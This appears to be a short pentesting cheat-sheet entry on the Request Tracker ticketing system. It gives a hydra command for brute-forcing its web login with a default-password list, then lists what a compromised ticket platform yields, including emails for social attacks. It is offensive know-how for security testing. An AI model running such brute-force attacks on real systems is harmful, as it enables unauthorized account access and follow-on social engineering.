Request Tracker

keeper

Request Tracker is an open-source (0.8k ⭐) issue tracker developed by Best Practical. The pentesting usages are a copy of osTicket usages.

You can try to brute force credentials:

$ hydra -C ftp-betterdefaultpasslist.txt IP http-post-form "/rt/NoAuth/Login.html:user=^USER^&pass=^PASS^:F=incorrect" -V -f

As a pentester, compromising a ticketing platform is often handy.

  • πŸ”‘ We may gain access to valid emails, either to access company-only platforms or perform social attacks

  • πŸ’΅ We may gain access to sensitive information

  • πŸ”« We may find usernames for other attacks

  • πŸ” We may be able to create users